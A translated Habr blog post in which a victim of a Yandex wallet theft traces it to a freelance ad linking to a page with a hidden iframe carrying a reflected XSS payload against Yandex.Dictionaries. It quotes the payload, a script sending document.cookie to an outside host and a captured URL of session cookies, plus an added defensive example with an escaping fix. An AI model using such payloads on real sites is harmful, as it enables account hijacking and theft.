
How to take my money from the Yandex wallet. Part 3. XSS

Continuation of the detective story “How to take my money from the Yandex wallet”. Part 3. XSS

Previous parts can be found here:

Part 1

Part 2.1

Part 2.2



Attention! An unexpected part!



In this part:

  1. Freelance.ru
  2. XSS on Yandex.Dictionaries
  3. Flashback
  4. Answer from Yandex.Money
  5. Questions to Yandex



Attention! No PR or anti-PR is intended in this article!



Freelance.ru



Like many Habr users, I sometimes look for work on various freelance sites. So it was this morning: I got up early, had nothing to do, and thought I would look for a job together with a partner. I searched several sites at once. On freelance.ru I saw one offer, “Site redesign”, and the price seemed decent: 8000 rubles. Fine, I thought, let me open it and have a look. Something in the assignment seemed familiar, but I let it slip. I started reading the replies: everyone wanted to take the job (people, by the way, read nothing at all and just blindly offer their services), and only a couple of comments made me pause. One of them read:

When will you die already, spammer


Then I immediately decided to go back to the top and click the site address given in the task [Attention! Click the address only if you use Firefox with NoScript! Why? Read below, and DO NOT click the link right away, only after reading the whole article! Just in case, the link was changed at the request of fstrange and fata1ex]: _http://tarandaz.ru. I clicked. Google Chrome took me to a site that looked familiar, but after a couple of seconds there was a redirect (I did not understand why it decided to do that). I saw a blank page ...



XSS on Yandex.Dictionaries



In the address bar of Google Chrome there was an interesting address:

  http://httpz.ru/nzakazchik.gif?yandexuid=2318214601243884128;%20yp=2145906000.gp.65_084965:103_682149:1 ordinary; .;%20yandex_login=my_name;%20L=YVdmDX9CAABmCEt8ClVwSn8DYAdBYQAGdy1mWzEVBEAiKClFBR82Pyo+ViQ5AFxTMScSIg4HLz4UJk8DAhIfGg==1257846938.6157.282848.2cc34301b2ce0d38049606bca0c1f5fc;%20narod_login=my_name;%20Session_id=1257846940.2726.0.38263038.2:208547497:0.62207.1514.047497eb07f8d2e7628d5a62e9bd2bd9;%20yabs-frequency=/2/IE1v08459zvKUW211I6DVcm0WGL1Kjzv08458GIPUG211I7Q07e0WGKXyarw08459oT4UW211ISaq7a0WGKXmUKz0845WVzTUW211I6UZM80WGKXFSTt07W5F000//fGA11G46


I started looking at it, and what did I see?! Right there: variables containing the word "yandex". Aha! I open Firefox with NoScript, follow the original link again, and NoScript says: “Attention! XSS attack prevented!” "Cool," I think. I dig into the source code of the main site and see a tag like this:

  <iframe src='http://slovari.yandex.ru/search.xml?text=&st_translate=sp%22<script>alert()</script>%3CSCRIPT type=text/javascript src=http://httpz.ru/zakazchikgo.js></SCRIPT>"' width='0' height='0' style='display:none'></iframe>


Well, I thought, holy cow! I go to the URL of the JS script and find this code:

  location.href = "http://httpz.ru/nzakazchik.gif?" + document.cookie;


Everything is clear! Steal the cookie, then log into the user's personal account as the user ...
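As an added example (not the post's own code; the render template is hypothetical, since the real Yandex page is not shown), here is the reflected-parameter defect that the iframe payload above exploits beside its output-encoding fix, plus a helper an incident responder can use to list which cookies a request to an exfiltration URL of this shape exposed:

```javascript
// Added example, not code from the original post. The render template is
// hypothetical: the real slovari.yandex.ru page is not shown in the article.
const ATTR_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };

function escapeHtmlAttr(value) {
  return String(value).replace(/[&<>"']/g, (c) => ATTR_ESCAPES[c]);
}

// Vulnerable: the st_translate query value is written into the attribute verbatim,
// so a value starting with %22 (a double quote) closes the attribute and the rest
// of the value lands in the page as live markup.
function renderVulnerable(stTranslate) {
  return `<input name="st_translate" value="${stTranslate}">`;
}

// Hardened: attribute-encode on output; the same value is now inert text.
function renderFixed(stTranslate) {
  return `<input name="st_translate" value="${escapeHtmlAttr(stTranslate)}">`;
}

// Incident-response helper: the stealer script appended document.cookie to the
// exfiltration URL's query string, so the request URL tells which cookies leaked.
function leakedCookieNames(exfilUrl) {
  const q = exfilUrl.indexOf("?");
  const query = q < 0 ? "" : decodeURIComponent(exfilUrl.slice(q + 1));
  return query.split(";").map((pair) => pair.trim().split("=")[0]).filter(Boolean);
}

// Constructed inputs modelled on the post: the payload as the browser decodes it
// from the iframe src, and an exfiltration URL with made-up host and cookie values.
const PAYLOAD = decodeURIComponent(
  'sp%22<script>alert()</script>%3CSCRIPT src=http://attacker.example/x.js></SCRIPT>"'
);
const EXFIL_URL =
  "http://attacker.example/nzakazchik.gif?yandexuid=111;%20yandex_login=my_name;%20L=AAAA==;%20Session_id=222.0.0.1:0.abcd";

console.log(renderVulnerable(PAYLOAD)); // markup breaks out of the attribute
console.log(renderFixed(PAYLOAD));      // payload stays inside value="..."
console.log(leakedCookieNames(EXFIL_URL)); // [ 'yandexuid', 'yandex_login', 'L', 'Session_id' ]
```

Marking Session_id and the other login cookies HttpOnly would additionally have kept them out of document.cookie, so the stealer script could not have read them even with the XSS present.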



Flashback



Then I remembered that before the money was stolen from me, I had also been going through a freelance site, had opened a similar ad and had also followed the link ... Where my profile was hacked is now clear. How the password was changed is a more interesting question. How the payment password was found out is even more interesting ...



Answer from Yandex.Money



As soon as I saw this scheme, sperans wrote back. She told me that this vulnerability had been passed on to the developers, and that with this scheme it is impossible to obtain the payment password from Yandex.Money (at the time of writing, the vulnerability is still there). In principle, I tried various login options, but I could not get the payment password with this scheme ...



Questions to Yandex



  1. How did you “investigate”? Read the message and copy-pasted from the instructions?
  2. Why am I, the account owner, given no information about how my account password was changed, from which IP the login was made, and whether the attackers somehow tried to recover my payment password?
  3. Were there any attempts to enter an incorrect payment password?
  4. Why did the payment password not change after the hack? (Only the account password + additional e-mail were changed ...)
  5. Why is this information “SUPER CONFIDENTIAL” (yes, in caps), available ONLY to Yandex and the police?!


I understand that if you had returned the money to me, I would not be particularly concerned with these questions, but as things stand the answers matter to me. As they do to other users, I think ...



Answers from Yandex

1. How did you “investigate”? Read the message and copy-pasted from the instructions?

- Of course, not only that. We checked from which IP the payment was made and where the money went, and then whether we could get it back. Whether it turned out to be possible to return it is confidential information. Sometimes, by the way, it is very frustrating: within ten minutes it becomes clear that the matter is 100% one for the police and we cannot do anything any more, and we sit and think that if we write to the user, he will decide that we did nothing :( when we simply already know the result.



2. Why am I, the account owner, given no information about how my account password was changed, from which IP the login was made, and whether the attackers somehow tried to recover my payment password?

- Because we do not send such information by e-mail. Other Habr users already explained this to you in the previous topics.



3. Were there any attempts to enter an incorrect payment password?

- It does not matter.



4. Why did the payment password not change after the hack? (Only the account password + additional e-mail were changed ...)

- This is a common pattern. I was not inside the attacker's head, but I suppose he simply did not bother. One login password changed, and that was enough.



5. Why is this information “SUPERCONFIDENTIAL” (yes, in caps), available ONLY to Yandex and the police?!

“I don’t even know how to explain why the information is confidential.” So why is the account holder's name confidential information? And the amount of his last payment to MTS, maybe it is only 10 rubles, why is that also a secret from me?




If anyone can help further in untangling this situation (in terms of understanding what happened after the cookie was stolen), I will be grateful!



PS The police department has not called yet. I think I will get ahead of them tomorrow ...



UPD. Yandex asked me to convey that the payment password is not transmitted in case of cookie theft. I want to note that I did not say it was. In two places the topic says that I DO NOT know how the payment password was extracted.



UPD 2. As reported by Yandex, the vulnerability has been closed.



The next part of the story is here: How to take my money from the Yandex wallet. Part 4. So what's up with the statement ?!

Source: https://habr.com/ru/post/74811/


